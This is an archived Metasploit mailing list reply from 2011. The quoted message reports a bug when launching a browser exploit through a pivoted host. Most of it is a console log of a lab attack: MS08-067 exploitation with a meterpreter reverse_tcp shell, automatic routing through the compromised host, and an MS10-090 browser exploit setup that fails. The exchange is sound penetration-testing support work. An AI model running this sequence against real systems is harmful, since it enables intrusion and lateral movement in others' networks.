Metasploit mailing list archives
Re: Unable to start Web Browser exploit on pivoted host
From: Sagar Belure <sagar.belure () gmail com>
Date: Sat, 22 Jan 2011 19:21:20 +0530
On Fri, Jan 21, 2011 at 11:51 PM, Hauke Mehrtens <hauke () hauke-m de> wrote:
I want to start a msf web server with a browser exploit on a already exploited host to exploit more host in the internal network visiting its website. My network configuration looks like this: Host A ----------------- Host P --------------- Host V (Attacker) (Pivoted) (Victim) 192.168.56.1/24 192.168.56.3/24 192.168.57.4/24 192.168.57.3/24 Ubuntu 10.10 Windows 2003 R2 SP2 Windows XP I am the attacker (Host A) and got a meterpreter session on the pivoted Host P. Now I want to start some web browser exploit to exploit Host V when it accesses this website. But when doing so I get the following error message: [-] Exploit exception: undefined method `on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x7fcac33318b0> The Host V does not have a direct network connection to the attacker. When starting the msf web server with the browser exploit on a local network interface on Host A, everything works like expected. This was done on Ubuntu 10.10 amd64 and i386 with the msf version from today. This was done with and without root rights. If this is a normal behavior and should not work, how do I forward a open port on the Host P to a web server on Host A so that Host V can access the browser Exploit?
This resembles with the case I had taken while presenting this: http://sec-ur-way.blogspot.com/2010/11/nu-delhi-presentations-post.html Hope that helps.
Hauke Here is the complete log with the things I did in Metasploit. msf > load auto_add_route [*] Successfully loaded plugin: auto_add_route msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.56.3 RHOST => 192.168.56.3 msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.56.3 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST 192.168.56.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.56.1:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown [*] We could not detect the language pack, defaulting to English [*] Selected Target: Windows 2003 SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1030) at Fri Jan 21 19:05:30 +0100 2011 [*] AutoAddRoute: Routing new subnet 192.168.56.0/255.255.255.0 through session 1 [*] AutoAddRoute: Routing new subnet 192.168.57.0/255.255.255.0 through session 1 [-] The 'stdapi' extension has already been loaded. meterpreter > background msf exploit(ms08_067_netapi) > use windows/browser/ms10_090_ie_css_clip msf exploit(ms10_090_ie_css_clip) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_090_ie_css_clip) > set SRVHOST 192.168.57.4 SRVHOST => 192.168.57.4 msf exploit(ms10_090_ie_css_clip) > set LHOST 192.168.57.4 LHOST => 192.168.57.4 msf exploit(ms10_090_ie_css_clip) > set URIPATH / URIPATH => / msf exploit(ms10_090_ie_css_clip) > show options Module options (exploit/windows/browser/ms10_090_ie_css_clip): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 192.168.57.4 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.57.4 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_090_ie_css_clip) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.57.4:4444 via the meterpreter on session 1 [-] Exploit exception: undefined method `on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x7fcac33318b0> msf exploit(ms10_090_ie_css_clip) > _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- Thanks, Sagar Belure Security Analyst Secfence Technologies www.secfence.com _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Unable to start Web Browser exploit on pivoted host Hauke Mehrtens (Jan 21)
- Re: Unable to start Web Browser exploit on pivoted host Sagar Belure (Jan 22)
- Re: Unable to start web browser exploit on pivoted host Hauke Mehrtens (Jan 22)